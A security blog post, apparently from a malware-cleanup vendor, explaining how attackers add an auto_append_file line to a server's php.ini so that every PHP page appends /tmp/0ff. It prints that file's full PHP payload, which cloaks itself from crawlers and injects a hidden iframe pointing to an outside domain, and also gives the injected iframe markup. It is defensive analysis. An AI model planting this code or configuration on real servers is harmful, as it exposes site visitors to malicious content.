Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = “0ff”

This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.

This is the code of the 0ff file:

<?php
if(!@isset($_COOKIE[‘PHPSESS1D’]) &&
 !@preg_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
 echo ‘<script type="text/javascript">
 d=new Date();
 d&#46setDate(d&#46getDate()+1);
 document&#46cookie="PHPSESS1D=1; path=/; expires=" + d&#46toGMTString();
 </script>’;
 echo ‘<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="
http://1306a95ajbr&#46liga4giurgiu&#46info/ad&#46jpg?2"></iframe>’;
}

So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.


Need help with malware? Need someone to clean your site? Sign up here: Sucuri

6 comments
  1. Yeah lol, a “vulnerability” that is a legitimate and docummented directive of PHP… If you leave your php.ini unprotected, it’s really your own fault, not phps…

  2. Anyway it’s a bad idea, most of distro’s around empty /tmp at boot by default. It will get deleted just rebooting.

  3. How is the php.ini being modified, are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?

Comments are closed.

You May Also Like